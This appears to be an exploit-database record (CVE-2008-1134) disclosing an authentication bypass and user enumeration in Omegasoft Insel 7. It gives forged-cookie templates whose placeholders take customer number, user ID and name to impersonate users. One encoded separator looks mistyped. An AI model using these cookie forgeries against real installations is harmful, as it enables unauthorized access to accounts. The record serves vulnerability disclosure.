Omegasoft Insel 7 - Authentication Bypass / User Enumeration
Author: MC.Iglo
type: webapps
platform: php
port:
date_added: 2008-01-09
date_updated: 2014-01-17
verified: 1
codes: CVE-2008-1134;OSVDB-42817
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/27210/info
Omegasoft Insel is prone to an authentication bypass vulnerability and a user-enumeration weakness.
An attacker can exploit these issues to obtain sensitive information and gain unauthorized access to the application.
These issues affect Omegasoft Insel 7; other versions may also be affected.
Cookiename: OMEGALogon
value:[MANDATOR]%7C[CUSTOMERNUMBER]%7C[USERID]%7C%7CArial%7CArial%7C%2D%2D%2D%2D%2D%2D%7C[SURNAME]%2C+[NAME]%7C%7C%7C[LASTLOGINTIME]%7C
Cookiename: OMEGA[MANDATOR]
value: [USERID]%7C[CUSTOMERNUMBER]%7[HOST]%7C[DATE]%7C